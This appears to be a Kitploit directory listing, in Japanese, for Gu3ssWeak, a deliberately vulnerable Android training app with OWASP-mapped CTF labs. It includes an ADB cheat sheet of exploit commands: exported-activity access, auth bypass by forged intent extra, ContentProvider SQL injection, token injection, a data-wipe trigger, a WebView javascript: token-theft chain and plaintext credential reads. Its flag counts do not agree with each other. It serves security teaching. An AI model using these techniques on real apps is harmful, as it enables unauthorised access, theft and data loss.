Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Gu3ssWeak — モバイルセキュリティ研究とバグバウンティの練習のための意図的に脆弱なAndroidアプリ - OWASP Mobile Top 10 | Kitploit
ツール/GitHubGitHub/b4sith-sec/gu3ssweak
Androidセキュリティ脆弱性分析モバイルアプリペンテストウェブアプリケーション悪用CTFペネトレーションテストモバイルセキュリティ学習と教育学習パスとコースラボと実践
GitHubb4sith-sec/gu3ssweak

Gu3ssWeak

8249日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

モバイルセキュリティ研究とバグバウンティの練習のための意図的に脆弱なAndroidアプリ - OWASP Mobile Top 10

リポジトリを見る

Gu3ssWeak

モバイルセキュリティ研究、バグバウンティの練習、およびCTF形式の学習を目的とした、意図的に脆弱性を持たせたAndroidアプリケーション。OWASP Mobile Top 10に対応付けられた21件の文書化された脆弱性を含みます。


クイックスタート

git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk

アプリを起動し、各ラボに取り組み、フラグをキャプチャして、アプリ内のCTFスコアボードに提出してください。


ラボカテゴリ

カテゴリ脆弱性フラグ
WebViewWV-01 から WV-055
DeeplinkDL-01 から DL-04、DL-CHAIN5
Auth / SQL InjectionSQL-011
Admin PanelAP-01 から AP-042
ContentProviderCP-011
Broadcast ReceiverBR-01 から BR-032
ServiceSV-01、SV-02a、SV-02b2
Network InterceptionNET-011
Banking / OTPOTP-011
LFILFI-011
StorageSTORE-011
XSSXSS-01、XSS-022

合計20個のフラグに加え、すべてをキャプチャするとマスターフラグが授与されます。


スクリーンショット

ラボ一覧CTFスコアボード
lab

CTFの流れ

  1. アプリを開く - ラボ一覧が直接表示されます。
  2. ラボを選択し、脆弱性を悪用します(UI、ADB、またはその両方を使用)。
  3. 各悪用が成功すると、そのフラグが自動的にキャプチャされます。
  4. 「Submit Flag」をタップして確認するか、「CTF Scoreboard」で進捗を確認します。
  5. 18個のフラグをすべてキャプチャすると、マスターフラグが解除されます。

ドキュメント

  • ARCHITECTURE.md - 各脆弱なコンポーネントが内部的にどのように動作するか
  • MITIGATIONS.md - すべての脆弱性に対する修正および修復のガイダンス(LFIからRCEへのエスカレーションの概念を含む)
  • SECURITY.md - セキュリティポリシーと責任ある開示
  • CHECKSUMS.txt - ビルドされたAPKのSHA256チェックサム

ADBエクスプロイトチートシート

# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity

Admin panel - bypass the "fixed" auth check via forged intent extra

adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true

ContentProvider grant bypass - parenthesis breakout escapes the single-row grant

adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""

# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker

# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data

# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"

# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml

# Watch for logged secrets
adb logcat | grep Gu3ssWeak

免責事項

このプロジェクトは純粋に教育目的です。すべての脆弱性は意図的なものであり、文書化されています。ここで示されている手法は実際のアプリにも適用できますが、テストするのは自分が所有するシステム、またはテストを許可されているシステムのみにしてください。完全な免責事項と責任ある開示のガイダンスについては、SECURITY.mdを参照してください。

ライセンス

MIT - LICENSEを参照してください。

ツールをダウンロード